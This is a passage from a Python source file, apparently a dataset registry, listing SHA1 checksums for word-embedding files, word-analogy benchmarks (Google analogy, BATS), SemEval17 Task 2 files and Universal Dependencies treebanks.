'7a94355754fbe56802242c0bf9d7a27335095552'), 'wiki.vi':\n ('wiki.vi.npz', 'f118039eb16a4ca3347b6b171eac41113350a041'), 'wiki.vls':\n ('wiki.vls.npz', '9a46a2fdc6448aa54f212081643745499ea7d05c'), 'wiki.vo':\n ('wiki.vo.npz', '8e2f93c85ac608bcc4ae14093b9ff016061378fb'), 'wiki.wa':\n ('wiki.wa.npz', '907074f7743d30cdbb2c48d0c8b4040796ea4164'), 'wiki.war':\n ('wiki.war.npz', '928fb410c394b9c18d875326b6a3e750e2611e1b'), 'wiki.wo':\n ('wiki.wo.npz', '7bb352be44f7261aa926f49b13e77df30f29312f'), 'wiki.wuu':\n ('wiki.wuu.npz', '0d1dc7b05867ff2156a1180ad3da3b4697924e59'),\n 'wiki.xal': ('wiki.xal.npz', 'd87f4a131e086dc0bdc2a7e10406820c3c03b6a9'\n ), 'wiki.xh': ('wiki.xh.npz',\n 'c64e1d2e77d1c744a628e2bd7353284616e48bea'), 'wiki.xmf': (\n 'wiki.xmf.npz', '160b9ee9773b9099aaf37ae9bdbc8a4a93b7f6ea'), 'wiki.yi':\n ('wiki.yi.npz', '0662542cee29f3392fc905004ac6443b32c1477c'), 'wiki.yo':\n ('wiki.yo.npz', '5d12d3b902a1fa19d8548295c3802c0608afa5c8'), 'wiki.za':\n ('wiki.za.npz', '536348ff89df62e968739b567a1245bfd4112fbe'), 'wiki.zea':\n ('wiki.zea.npz', '61fa192289a7c0f73ffa8035632a38b91c31c224'),\n 'wiki.zh_classical': ('wiki.zh_classical.npz',\n '9acc9eaf8ebe316b945fb1f56ac71a2b7e024854'), 'wiki.zh_min_nan': (\n 'wiki.zh_min_nan.npz', '5d38bc025c82af578299d60f7df7b399de6ed81a'),\n 'wiki.zh': ('wiki.zh.npz', '94007fcf3b105bf2c21b84a3a22bdb7946e74804'),\n 'wiki.zh_yue': ('wiki.zh_yue.npz',\n 'af6f0d94e6418d528d6cedd859e07e6e2fb416ab'), 'wiki.zu': ('wiki.zu.npz',\n 'fc9ce07d5d0c49a3c86cf1b26056ada58f9404ca')}\nGOOGLEANALOGY_CATEGORIES = ['capital-common-countries', 'capital-world',\n 'currency', 'city-in-state', 'family', 'gram1-adjective-to-adverb',\n 'gram2-opposite', 'gram3-comparative', 'gram4-superlative',\n 'gram5-present-participle', 'gram6-nationality-adjective',\n 'gram7-past-tense', 'gram8-plural', 'gram9-plural-verbs']\nBATS_CHECKSUMS = {\n 'BATS_3.0/1_Inflectional_morphology/I01 [noun - plural_reg].txt':\n 'cfcba2835edf81abf11b84defd2f4daa3ca0b0bf',\n 'BATS_3.0/1_Inflectional_morphology/I02 [noun - plural_irreg].txt':\n '44dbc56432b79ff5ce2ef80b6840a8aa916524f9',\n 'BATS_3.0/1_Inflectional_morphology/I03 [adj - comparative].txt':\n 'dc530918e98b467b8102a7dab772a66d3db32a73',\n 'BATS_3.0/1_Inflectional_morphology/I04 [adj - superlative].txt':\n '6c6fdfb6c733bc9b298d95013765163f42faf6fb',\n 'BATS_3.0/1_Inflectional_morphology/I05 [verb_inf - 3pSg].txt':\n '39fa47ec7238ddb3f9818bc586f23f55b55418d8',\n 'BATS_3.0/1_Inflectional_morphology/I06 [verb_inf - Ving].txt':\n '8fabeb9f5af6c3e7154a220b7034bbe5b900c36f',\n 'BATS_3.0/1_Inflectional_morphology/I07 [verb_inf - Ved].txt':\n 'aa04df95aa2edb436cbcc03c7b15bc492ece52d6',\n 'BATS_3.0/1_Inflectional_morphology/I08 [verb_Ving - 3pSg].txt':\n '5f22d8121a5043ce76d3b6b53a49a7bb3fe33920',\n 'BATS_3.0/1_Inflectional_morphology/I09 [verb_Ving - Ved].txt':\n '377777c1e793c638e72c010228156d01f916708e',\n 'BATS_3.0/1_Inflectional_morphology/I10 [verb_3pSg - Ved].txt':\n '051c0c3c633e10900f827991dac14cf76da7f022',\n 'BATS_3.0/2_Derivational_morphology/D01 [noun+less_reg].txt':\n '5d6839e9d34ee1e9fddb5bbf6516cf6420b85d8d',\n 'BATS_3.0/2_Derivational_morphology/D02 [un+adj_reg].txt':\n '80b82227a0d5f7377f1e8cebe28c582bfeb1afb5',\n 'BATS_3.0/2_Derivational_morphology/D03 [adj+ly_reg].txt':\n '223e120bd61b3116298a253f392654c15ad5a39a',\n 'BATS_3.0/2_Derivational_morphology/D04 [over+adj_reg].txt':\n 'a56f8685af489bcd09c36f864eba1657ce0a7c28',\n 'BATS_3.0/2_Derivational_morphology/D05 [adj+ness_reg].txt':\n '5da99b1f1781ecfb4a1a7448c715abf07451917b',\n 
'BATS_3.0/2_Derivational_morphology/D06 [re+verb_reg].txt':\n '4c5e1796091fade503fbf0bfc2fae2c7f98b5dd2',\n 'BATS_3.0/2_Derivational_morphology/D07 [verb+able_reg].txt':\n 'a6218162bc257d98e875fc667c23edfac59e19fd',\n 'BATS_3.0/2_Derivational_morphology/D08 [verb+er_irreg].txt':\n '9a4236c3bbc23903e101a42fb5ad6e15e552fadf',\n 'BATS_3.0/2_Derivational_morphology/D09 [verb+tion_irreg].txt':\n '3ab0153926d5cf890cf08a4077da6d9946133874',\n 'BATS_3.0/2_Derivational_morphology/D10 [verb+ment_irreg].txt':\n '2a012b87a9a60e128e064c5fe24b60f99e16ddce',\n 'BATS_3.0/3_Encyclopedic_semantics/E01 [country - capital].txt':\n '9890315d3c4e6a38b8ae5fc441858564be3d3dc4',\n 'BATS_3.0/3_Encyclopedic_semantics/E02 [country - language].txt':\n 'ef08a00e8ff7802811ace8f00fabac41b5d03678',\n 'BATS_3.0/3_Encyclopedic_semantics/E03 [UK_city - county].txt':\n '754957101c93a25b438785bd4458404cd9010259',\n 'BATS_3.0/3_Encyclopedic_semantics/E04 [name - nationality].txt':\n '71a6562c34fb6154992a7c3e499375fcc3529c96',\n 'BATS_3.0/3_Encyclopedic_semantics/E05 [name - occupation].txt':\n 'a9a6f9f1af959aef83106f3dbd6bed16dfe9a3ea',\n 'BATS_3.0/3_Encyclopedic_semantics/E06 [animal - young].txt':\n '12d5b51c7b76b9136eadc719abc8cf4806c67b73',\n 'BATS_3.0/3_Encyclopedic_semantics/E07 [animal - sound].txt':\n '91991b007a35f45bd42bd7d0d465c6f8311df911',\n 'BATS_3.0/3_Encyclopedic_semantics/E08 [animal - shelter].txt':\n 'e5af11e216db392986ba0cbb597d861066c29adb',\n 'BATS_3.0/3_Encyclopedic_semantics/E09 [things - color].txt':\n 'd30b2eb2fc7a60f19afda7c54582e30f6fe28f51',\n 'BATS_3.0/3_Encyclopedic_semantics/E10 [male - female].txt':\n '247a588671bc1da8f615e14076bd42573d24b4b3',\n 'BATS_3.0/4_Lexicographic_semantics/L01 [hypernyms - animals].txt':\n '4b5c4dabe2c9c038fafee85d8d3958f1b1dec987',\n 'BATS_3.0/4_Lexicographic_semantics/L02 [hypernyms - misc].txt':\n '83d5ecad78d9de28fd70347731c7ee5918ba43c9',\n 'BATS_3.0/4_Lexicographic_semantics/L03 [hyponyms - misc].txt':\n 'a8319856ae2f76b4d4c030ac7e899bb3a06a9a48',\n 'BATS_3.0/4_Lexicographic_semantics/L04 [meronyms - substance].txt':\n 'c081e1104e1b40725063f4b39d13d1ec12496bfd',\n 'BATS_3.0/4_Lexicographic_semantics/L05 [meronyms - member].txt':\n 'bcbf05f3be76cef990a74674a9999a0bb9790a07',\n 'BATS_3.0/4_Lexicographic_semantics/L06 [meronyms - part].txt':\n '2f9bdcc74b881e1c54b391c9a6e7ea6243b3accc',\n 'BATS_3.0/4_Lexicographic_semantics/L07 [synonyms - intensity].txt':\n '8fa287860b096bef004fe0f6557e4f686e3da81a',\n 'BATS_3.0/4_Lexicographic_semantics/L08 [synonyms - exact].txt':\n 'a17c591961bddefd97ae5df71f9d1559ce7900f4',\n 'BATS_3.0/4_Lexicographic_semantics/L09 [antonyms - gradable].txt':\n '117fbb86504c192b33a5469f2f282e741d9c016d',\n 'BATS_3.0/4_Lexicographic_semantics/L10 [antonyms - binary].txt':\n '3cde2f2c2a0606777b8d7d11d099f316416a7224'}\nBATS_CATEGORIES = {'I01': '[noun - plural_reg]', 'I02':\n '[noun - plural_irreg]', 'I03': '[adj - comparative]', 'I04':\n '[adj - superlative]', 'I05': '[verb_inf - 3pSg]', 'I06':\n '[verb_inf - Ving]', 'I07': '[verb_inf - Ved]', 'I08':\n '[verb_Ving - 3pSg]', 'I09': '[verb_Ving - Ved]', 'I10':\n '[verb_3pSg - Ved]', 'D01': '[noun+less_reg]', 'D02': '[un+adj_reg]',\n 'D03': '[adj+ly_reg]', 'D04': '[over+adj_reg]', 'D05': '[adj+ness_reg]',\n 'D06': '[re+verb_reg]', 'D07': '[verb+able_reg]', 'D08':\n '[verb+er_irreg]', 'D09': '[verb+tion_irreg]', 'D10':\n '[verb+ment_irreg]', 'E01': '[country - capital]', 'E02':\n '[country - language]', 'E03': '[UK_city - county]', 'E04':\n '[name - nationality]', 'E05': '[name - occupation]', 
'E06':\n '[animal - young]', 'E07': '[animal - sound]', 'E08':\n '[animal - shelter]', 'E09': '[things - color]', 'E10':\n '[male - female]', 'L01': '[hypernyms - animals]', 'L02':\n '[hypernyms - misc]', 'L03': '[hyponyms - misc]', 'L04':\n '[meronyms - substance]', 'L05': '[meronyms - member]', 'L06':\n '[meronyms - part]', 'L07': '[synonyms - intensity]', 'L08':\n '[synonyms - exact]', 'L09': '[antonyms - gradable]', 'L10':\n '[antonyms - binary]'}\nSEMEVAL17_CHECKSUMS = {'SemEval17-Task2/README.txt':\n 'ad02d4c22fff8a39c9e89a92ba449ec78750af6b',\n 'SemEval17-Task2/task2-scorer.jar':\n '145ef73ce955656d59e3b67b41f8152e8ee018d8',\n 'SemEval17-Task2/test/subtask1-monolingual/data/de.test.data.txt':\n '6fc840f989d2274509549e472a68fb88dd2e149f',\n 'SemEval17-Task2/test/subtask1-monolingual/data/en.test.data.txt':\n '05293fcbd80b2f4aad9b6518ce1a546ad8f61f33',\n 'SemEval17-Task2/test/subtask1-monolingual/data/es.test.data.txt':\n '552904b5988f9951311290ca8fa0441dd4351d4b',\n 'SemEval17-Task2/test/subtask1-monolingual/data/fa.test.data.txt':\n '29d5970feac5982961bd6ab621ba31f83d3bff77',\n 'SemEval17-Task2/test/subtask1-monolingual/data/it.test.data.txt':\n 'c95fe2be8fab37e9c70610117bdedc48a0a8e95c',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/de.test.gold.txt':\n 'c51463460495a242cc726d41713c5e00b66fdd18',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/en.test.gold.txt':\n '2d2bb2ed41308cc60e7953cc9036f7dc89141b48',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/es.test.gold.txt':\n 'a5842ff17fe3847d15414924826a8eb236018bcc',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/fa.test.gold.txt':\n '717bbe035d8ae2bad59416eb3dd4feb7238b97d4',\n 'SemEval17-Task2/test/subtask1-monolingual/keys/it.test.gold.txt':\n 'a342b950109c73afdc86a7829e17c1d8f7c482f0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-es.test.data.txt':\n 'ef92b1375762f68c700e050d214d3241ccde2319',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-fa.test.data.txt':\n '17aa103981f3193960309bb9b4cc151acaf8136c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/de-it.test.data.txt':\n 'eced15e8565689dd67605a82a782d19ee846222a',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-de.test.data.txt':\n '5cb69370a46385a7a3d37cdf2018744be77203a0',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-es.test.data.txt':\n '402f7fed52b60e915fb1be49f935395488cf7a7b',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-fa.test.data.txt':\n '9bdddbbde3da755f2a700bddfc3ed1cd9324ad48',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/en-it.test.data.txt':\n 'd3b37aac79ca10311352309ef9b172f686ecbb80',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-fa.test.data.txt':\n 'a2959aec346c26475a4a6ad4d950ee0545f2381e',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/es-it.test.data.txt':\n 'ca627c30143d9f82a37a8776fabf2cee226dd35c',\n 'SemEval17-Task2/test/subtask2-crosslingual/data/it-fa.test.data.txt':\n 'a03d79a6ce7b798356b53b4e85dbe828247b97ef',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-es.test.gold.txt':\n '7564130011d38daad582b83135010a2a58796df6',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-fa.test.gold.txt':\n 'c9e23c2e5e970e7f95550fbac3362d85b82cc569',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/de-it.test.gold.txt':\n 'b74cc2609b2bd2ceb5e076f504882a2e0a996a3c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-de.test.gold.txt':\n '428dfdad2a144642c13c24b845e6b7de6bf5f663',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-es.test.gold.txt':\n 
'1dd7ab08a10552486299151cdd32ed19b56db682',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-fa.test.gold.txt':\n '17451ac2165aa9b695dae9b1aba20eb8609fb400',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/en-it.test.gold.txt':\n '5041c0b84a603ed85aa0a5cbe4b1c34f69a2fa7c',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-fa.test.gold.txt':\n '8c09a219670dc32ab3864078bf0c28a287accabc',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/es-it.test.gold.txt':\n 'b1cdd13209354cc2fc2f4226c80aaa85558daf4a',\n 'SemEval17-Task2/test/subtask2-crosslingual/keys/it-fa.test.gold.txt':\n 'e0b560bb1d2db39ce45e841c8aad611734dc94f1',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/de.trial.data.txt':\n 'dd071fd90f59bec8d271a447d86ee2e462941f52',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/en.trial.data.txt':\n 'e8e5add0850b3dec07f102be26b8791a5e9bbbcf',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/es.trial.data.txt':\n '8956c78ff9ceae1d923a57816e55392c6a7dfc49',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/fa.trial.data.txt':\n '2f7c4247cde0d918b3508e90f6b49a1f5031c81b',\n 'SemEval17-Task2/trial/subtask1-monolingual/data/it.trial.data.txt':\n 'c11e0b5b55f94fc97c7b11fa455e71b071be879f',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/de.trial.gold.txt':\n 'ce5567b1accf3eb07da53229dfcb2a8a1dfac380',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/en.trial.gold.txt':\n '693cb5928e807c79e39136dc0981dadca7832ae6',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/es.trial.gold.txt':\n '8241ca66bf5ba55f77607e9bcfae8e34902715d8',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/fa.trial.gold.txt':\n 'd30701a93c8c5500b82ac2334ed8410f9a23864b',\n 'SemEval17-Task2/trial/subtask1-monolingual/keys/it.trial.gold.txt':\n 'bad225573e1216ba8b35429e9fa520a20e8ce031',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/de.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/en.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/es.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/fa.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask1-monolingual/output/it.trial.sample.output.txt'\n : 'f85cba9f6690d61736623c16e620826b09384aa5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-es.trial.data.txt':\n 'c27c8977d8d4434fdc3e59a7b0121d87e0a03237',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-fa.trial.data.txt':\n '88a6f6dd1bba309f7cae7281405e37f442782983',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/de-it.trial.data.txt':\n 'ebdab0859f3b349fa0120fc8ab98be3394f0d73d',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-de.trial.data.txt':\n '128d1a460fe9836b66f0fcdf59455b02edb9f258',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-es.trial.data.txt':\n '508c5dde8ffcc32ee3009a0d020c7c96a338e1d1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-fa.trial.data.txt':\n '1a3640eb5facfe15b1e23a07183a2e62ed80c7d9',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/en-it.trial.data.txt':\n '141c83d591b0292016583d9c23a2cc5514a006aa',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-fa.trial.data.txt':\n 'a0a548cd698c389ee80c34d6ec72abed5f1625e5',\n 'SemEval17-Task2/trial/subtask2-crosslingual/data/es-it.trial.data.txt':\n '8d42bed8a43ff93d26ca95794758d9392ca707ed',\n 
'SemEval17-Task2/trial/subtask2-crosslingual/data/it-fa.trial.data.txt':\n '9c85223f1f734de61c28157df0ce417bb0537803',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-es.trial.gold.txt':\n '126c92b2fb3b8f2784dd4ae2a4c52b02a87a8196',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-fa.trial.gold.txt':\n '1db6201c2c8f19744c39dbde8bd4a803859d64c1',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/de-it.trial.gold.txt':\n '5300bf2ead163ff3981fb41ec5d0e291c287c9e0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-de.trial.gold.txt':\n 'd4f5205de929bb0c4020e1502a3f2204b5accd51',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-es.trial.gold.txt':\n '3237e11c3a0d9c0f5d583f8dc1d025b97a1f8bfe',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-fa.trial.gold.txt':\n 'c14de7bf326907336a02d499c9b92ab229f3f4f8',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/en-it.trial.gold.txt':\n '3c0276c4b4e7a6d8a618bbe1ab0f30ad7b07929c',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-fa.trial.gold.txt':\n '359f69e9dfd6411a936baa3392b8f05c398a7707',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/es-it.trial.gold.txt':\n '44090607fabe5a26926a384e521ef1317f6f00d0',\n 'SemEval17-Task2/trial/subtask2-crosslingual/keys/it-fa.trial.gold.txt':\n '97b09ffa11803023c2143fd4a4ac4bbc9775e645',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-es.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-fa.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/de-it.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-de.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-es.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-fa.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/en-it.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-fa.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/es-it.trial.sample.output.txt'\n : 'b71166d8615e921ee689cefc81419398d341167f',\n 'SemEval17-Task2/trial/subtask2-crosslingual/output/it-fa.trial.sample.output.txt'\n : 'a0735361a692be357963959728dacef85ea08240'}\nUD21_DATA_FILE_SHA1 = {'af': {'dev': ('af-ud-dev.conllu',\n 'e37b104f4425ee00afc81779201816d5ac525194'), 'test': (\n 'af-ud-test.conllu', 'd2bf02370d308ee957c04242bd0871db0e488389'),\n 'train': ('af-ud-train.conllu',\n 'a652c7b19c236063d3ea489947f83095893b699a')}, 'grc_proiel': {'dev': (\n 'grc_proiel-ud-dev.conllu', 'd199530c7e40ff0214e510957bb126af0dc12c1c'),\n 'test': ('grc_proiel-ud-test.conllu',\n 'bb7825ddeb18fc2d86638e4725f04563f3e08aab'), 'train': (\n 'grc_proiel-ud-train.conllu',\n 'fe6c861299b033abe8c4ce2b6131cd74f87b96a7')}, 'grc': {'dev': (\n 'grc-ud-dev.conllu', 'debdfec0272cd558ccd29fe0ae2f13175dd20a33'),\n 'test': ('grc-ud-test.conllu',\n 'f19accf31db95e2c736d716d3438c09aa877eb07'), 'train': (\n 'grc-ud-train.conllu', 'e98d3eabea67787c5d43a498f5a0fa4246f38104')},\n 'ar_nyuad': {'dev': ('ar_nyuad-ud-dev.conllu',\n 'b740de9bd68e68b30b9b313eb050d44e94470ca5'), 'test': 
(\n 'ar_nyuad-ud-test.conllu', 'f5d5b8979b7fedd76235d4bae77e0b4a7b0a750a'),\n 'train': ('ar_nyuad-ud-train.conllu',\n 'd065f03958fd8782a7431b6778c6665ad09444a6')}, 'ar_pud': {'test': (\n 'ar_pud-ud-test.conllu', '2161701e6726b6feb14733a312fba6160b9eb722')},\n 'ar': {'dev': ('ar-ud-dev.conllu',\n '5f8964974d5ba5eb3504cdafb93c34c473c4177c'), 'test': (\n 'ar-ud-test.conllu', '58df161047f310cc3bb4d0e615ca33466e630bb9'),\n 'train': ('ar-ud-train.conllu',\n '0a3d5cefa1fecd6a74f2016ee73ea7a7a02eb359')}, 'eu': {'dev': (\n 'eu-ud-dev.conllu', '3ee15b5ed46ec93d7278c8cc0351d242417d553d'), 'test':\n ('eu-ud-test.conllu', 'aa68d6442ac6dc1abedc19c1b98c4a9944786188'),\n 'train': ('eu-ud-train.conllu',\n 'd56ec997916e38ee6ab1badd78c119e81e4797c9')}, 'be': {'dev': (\n 'be-ud-dev.conllu', '015473e91cf8937c46e8b721f206415abac16a35'), 'test':\n ('be-ud-test.conllu', 'f009ea1885f54cfd77fca8a2c89133b2af8f9f5e'),\n 'train': ('be-ud-train.conllu',\n '26b871e28d2f356a709f106b6e3e86b417ba74e7')}, 'bg': {'dev': (\n 'bg-ud-dev.conllu', '0a2284b10547681eb65691eb2a9f0f1662e16e90'), 'test':\n ('bg-ud-test.conllu', '75ea2a5e1d55bb57efecae6ec2b5ac3cc1b37e57'),\n 'train': ('bg-ud-train.conllu',\n 'd4b2fa267010c4486885c91f3af65ff66c8be94c')}, 'bxr': {'sample': (\n 'bxr-ud-sample.conllu', '9239bdd251a60820c71111ec54de9e7d58a8579d'),\n 'test': ('bxr-ud-test.conllu',\n '0a06e527454ae0b547153222f67eb5db94e528fd')}, 'yue': {'test': (\n 'yue-ud-test.conllu', 'd91477c65aa75cd45489cca13f7a122066972bdb')},\n 'ca': {'dev': ('ca-ud-dev.conllu',\n '5737824f0afff0d07a43db331f102d62c6da2d96'), 'test': (\n 'ca-ud-test.conllu', '0e28bd2a3b982515c1158194ad52bcbbe741e170'),\n 'train': ('ca-ud-train.conllu',\n 'b5ff2392722d4a1df3bfc52fa5b8f2043b7aec0c')}, 'zh_cfl': {'test': (\n 'zh_cfl-ud-test.conllu', '32fe45cd0e4e11ced95202971bce74acbc6a8c30')},\n 'zh_hk': {'test': ('zh_hk-ud-test.conllu',\n '4c75fa5bbcdcb181447b4e037224d50feb2776fb')}, 'zh_pud': {'test': (\n 'zh_pud-ud-test.conllu', 'b3e448884b7b6229379f9723b97c6e9a6fedcb61')},\n 'zh': {'dev': ('zh-ud-dev.conllu',\n '34d8253b35ad2245d59ddffa71b5689ef267b6b2'), 'test': (\n 'zh-ud-test.conllu', '0f00516097650c12262298dd0fbd1b17a6d2bfe2'),\n 'train': ('zh-ud-train.conllu',\n '9444eec5f4561f289ad140e47e49013689512a65')}, 'cop': {'dev': (\n 'cop-ud-dev.conllu', '863d1004df1a92df52515105f6fae6ff68539595'),\n 'test': ('cop-ud-test.conllu',\n 'd3b33566679f071d4ad622ad840cd98381835706'), 'train': (\n 'cop-ud-train.conllu', '33d0e5de5d6077f7c52a4cd90bce0047f3e9ff6f')},\n 'hr': {'dev': ('hr-ud-dev.conllu',\n '8da2a419980807d2e91e09b6bf496e58d442b0ba'), 'test': (\n 'hr-ud-test.conllu', '49d673cba3d32d39d413e557276a45a0214ed83e'),\n 'train': ('hr-ud-train.conllu',\n 'e5cc686bb46c80c84c3ac60ed459e1f124c04c08')}, 'cs_cac': {'dev': (\n 'cs_cac-ud-dev.conllu', '69dfed28c29146b41a3428f4715bde70a6aecf00'),\n 'test': ('cs_cac-ud-test.conllu',\n 'a994b33ebbde486c1818a9df460fb112055e95de'), 'train': (\n 'cs_cac-ud-train.conllu', '694f8559471dc481612606bf5df078daa094a84e')},\n 'cs_cltt': {'dev': ('cs_cltt-ud-dev.conllu',\n 'f35d5dbe57cd95760901ea29de4f493d5d2a44d4'), 'test': (\n 'cs_cltt-ud-test.conllu', 'a8f6696785e658471f759bc736b738a105cba9a3'),\n 'train': ('cs_cltt-ud-train.conllu',\n 'ab97886066bfa462e5da03d25f802489292c0b56')}, 'cs_fictree': {'dev': (\n 'cs_fictree-ud-dev.conllu', 'dc67c07737a3a8bf2633068941f2d55f1500e192'),\n 'test': ('cs_fictree-ud-test.conllu',\n '06becaedef1cfdb8e1b2dce3f0d3a3a607d178a4'), 'train': (\n 'cs_fictree-ud-train.conllu',\n 'fe7dbe3a0e6ee73e19e788c43bbb8f8f47ae1645')}, 
'cs_pud': {'test': (\n 'cs_pud-ud-test.conllu', '9f205677041de694157ba2ef3e1eadb44d467f2f')},\n 'cs': {'dev': ('cs-ud-dev.conllu',\n 'd609e895b21b8710337e23a98b58ffd7b7a54bf1'), 'test': (\n 'cs-ud-test.conllu', '34091286a11b1ce2a9c8bcfa03fdd86fb0e13965'),\n 'train': ('cs-ud-train.conllu',\n 'd1f855798a29d433b580d01ade0d8d062cd58534')}, 'da': {'dev': (\n 'da-ud-dev.conllu', '2c0c798c20a2efb30273172d388342a82bb0ce3c'), 'test':\n ('da-ud-test.conllu', '85a95a8527f8773f1575ceaf0ab51f204b211047'),\n 'train': ('da-ud-train.conllu',\n 'b653c029a7ae5c106f865dcef949fb3fe2aa0420')}, 'nl_lassysmall': {'dev':\n ('nl_lassysmall-ud-dev.conllu',\n '2a169af74c2206c9073c3932b4a300492a314ee5'), 'test': (\n 'nl_lassysmall-ud-test.conllu',\n '39f08896a40ad370f2acc37d58689cdc43a660a9'), 'train': (\n 'nl_lassysmall-ud-train.conllu',\n 'e4fd6bac246c81bb17a3c932e251b8662739cc19')}, 'nl': {'dev': (\n 'nl-ud-dev.conllu', '33a9387eef9f5c0b15bd1e76e78776863f1f6d90'), 'test':\n ('nl-ud-test.conllu', '01b3e1048792c851fdd59882c353fcdb76dc165e'),\n 'train': ('nl-ud-train.conllu',\n '8e6a10152b7d09ce61433dd5f715ab2401611cf6')}, 'en_lines': {'dev': (\n 'en_lines-ud-dev.conllu', '83b63b7670ea4394b558bc26e16a004339f0a0ef'),\n 'test': ('en_lines-ud-test.conllu',\n 'ccc9d3c71a873313d138c3adb12405a97eb270d8'), 'train': (\n 'en_lines-ud-train.conllu', 'da42bfac9fd97d98ebbbc37c65d83ff4c53b4e79')\n }, 'en_pud': {'test': ('en_pud-ud-test.conllu',\n '4a9c83ba058a7e51979af790ba0440cc274b948f')}, 'en_partut': {'dev': (\n 'en_partut-ud-dev.conllu', '863a6f571158acaaca95223e50bd08fc0c1134f0'),\n 'test': ('en_partut-ud-test.conllu',\n '0c0780b0f14e4623f1014e6496d639cd2d2f6ffd'), 'train': (\n 'en_partut-ud-train.conllu', 'e00a2d6f7efa28c8aaa40dccdf29b59a50f48e18'\n )}, 'en': {'dev': ('en-ud-dev.conllu',\n 'e2159dda4400d289ad8a403b466c8d23d733ba35'), 'test': (\n 'en-ud-test.conllu', 'bd36ef23f76155625b379d063427bd62f19b7658'),\n 'train': ('en-ud-train.conllu',\n '993c44f62104971fe2d056847349facbb7986258')}, 'et': {'dev': (\n 'et-ud-dev.conllu', '312f9477f7ee1dd380c1fbcf77a6f0c63476fdbb'), 'test':\n ('et-ud-test.conllu', 'd70907f0771b41a27406672b9d91043a0954f946'),\n 'train': ('et-ud-train.conllu',\n 'b6d788e7a3362d0984d1cff06c1ba3d66f6bf773')}, 'fi_ftb': {'dev': (\n 'fi_ftb-ud-dev.conllu', '552ec574acdb3209e7545af4e16a43a1e2956979'),\n 'test': ('fi_ftb-ud-test.conllu',\n '13c34838a0fa9e379f9624ed1f4c368ca50a7d98'), 'train': (\n 'fi_ftb-ud-train.conllu', '73d025250bfc82a24181b5ed601dc4ae7c8e846c')},\n 'fi_pud': {'test': ('fi_pud-ud-test.conllu',\n '4ab7b0d99ce6697d79732e401be97585a28c2afa')}, 'fi': {'dev': (\n 'fi-ud-dev.conllu', 'e023cf7eaffbda20bd4518d87fe9086207bb5361'), 'test':\n ('fi-ud-test.conllu', 'fd57c5106e43994250f4472890572bdbb8b4a48b'),\n 'train': 